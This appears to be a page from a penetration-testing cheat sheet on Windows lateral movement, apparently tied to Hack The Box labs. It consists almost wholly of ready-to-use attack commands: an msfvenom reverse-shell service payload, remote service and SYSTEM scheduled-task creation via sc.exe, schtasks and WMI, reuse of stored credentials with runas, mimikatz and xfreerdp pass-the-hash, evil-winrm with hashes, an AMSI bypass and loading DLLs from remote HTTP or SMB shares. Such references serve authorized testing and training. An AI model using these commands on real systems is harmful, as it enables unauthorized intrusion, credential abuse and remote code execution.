Remote administration
Note that executables created by msfvenom to be used by a service have to be created with type exe-service instead of exe to prevent the shell from dying after the task is completed.
Copy msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=<ip> LPORT=<port> -o <filename>.exe
With sc.exe
Copy sc.exe \\<host> create <service name> binPath="<cmd>" start=auto
sc.exe \\<host> start <service name>
With schtasks
Copy schtasks /s <host> /RU "SYSTEM" /create /tn "<task name>" /tr "<cmd or payload>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s <host> /run /TN "<task name>"
Run with stored credentials
Copy cmdkey /list //get a list of credentials, runas will use the ones in memory
runas /savecred /user:<domain>\<user> "\\<ip>\<path>" //connect to share
runas /savecred /user:<domain>\<user> "cmd.exe /k <cmd>" //run command as user
Run by specifying username and password
Copy runas /env /noprofile /user:<domain>/<user> <password> "cmd.exe /k <cmd>"
runas /netonly /user:<domain>\<user> "cmd.exe /k <cmd>"
Run as another user on the same machine
Copy runas /user:<user> "cmd.exe /k <cmd>"
Execute code
Copy wmic.exe /user:<user> /password:<pass> /node:<host> process call create "cmd.exe /c <cmd>"
Run local msi installer
Copy wmic.exe /user:<user> /password:<pass> /node:<host> product call install PackageLocation="<path to msi>"
Copy privilege::debug
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:"mstsc.exe /restrictedadmin"
Copy xfreerdp +clipboard /dynamic-resolution /cert-ignore /u:<user> /pth:<ntlm hash> /v:<host>
Powershell remoting
Manage sessions
Enable remoting (Administrative privileges required)
connect to machine
Copy Enter-PSSession -ComputerName <fqdn>
Store session data and connect
Copy $<varname>= New-PSSession -ComputerName <fqdn>
Enter-PSSession -Sessions <varname>
Code execution
Copy //disable limit on laguage, enable scriptlets
Invoke-Command -ComputerName <fqdn> -ScriptBlock {$ExecutionContext.SessionState.LanguageMode}
Invoke-Command -ComputerName <fqdn> -ScriptBlock {<code>}
Invoke-Command -ComputerName <fqdn> -FilePath <path> //script from file
Code execution with valid credentials
Load credentials
Copy $session = New-PSSession -ComputerName <fqdn>
$secPassword = ConvertTo-SecureString '<pass>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb.local\<username>', $secPassword)
Execute command
Copy Invoke-Command -ComputerName <fqdn> -Credential $cred -ScriptBlock {<commands>}
Run a PowerShell script remotely
Copy Invoke-Command -Credential $cred -ComputerName <fqdn> -FilePath <path to ps1 file> -Session $session
Powershell + WMI module
Connect to WMI
Store credentials
Copy $username = '<user>';
$password = '<pass>';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Start session. WMI supports two protocols: DCOM (port 135 and 49152-65535) or Wsman (ports 5985 and 5986)
Copy $Opt = New-CimSessionOption -Protocol <DCOM|Wsman>
$Session = New-Cimsession -ComputerName <host> -Credential $credential -SessionOption $Opt -ErrorAction Stop
Execute command
Copy Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = "<cmd>"
Create service
Copy Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "<name>";
DisplayName = "<name>";
PathName = "<payload>";
ServiceType = [byte]::Parse("16");
StartMode = "Manual"
Retrieve and start the service
Copy $Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE '<name>'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
Create scheduled task
Copy $Command = "<executable i.e. cmd, powershell...>"
$Args = "<args>"
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "<name>"
Start-ScheduledTask -CimSession $Session -TaskName "<name>"
Install MSI package
Copy Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "<path to msi>"; Options = ""; AllUsers = $false}
Ps1 files must be stored in path specified by -s option. To execute a script simply type its name in the console.
Copy evil-winrm -i <ip> -u Administrator -p <password>
evil-winrm -i <ip> -u Administrator -H <hash>
In-memory execution + AMSI Bypass
Find pre-compiled binaries for in-memory execution here:
Copy menu
Invoke-Binary <path to local compiled file>
Dll loader
Copy Dll-loader -http -path http://<path to .dll>
Dll-loader -smb -path \\<share>\\<file>.dll
Dll-loader -local -path C:\<path to dll>
Last updated 8 months ago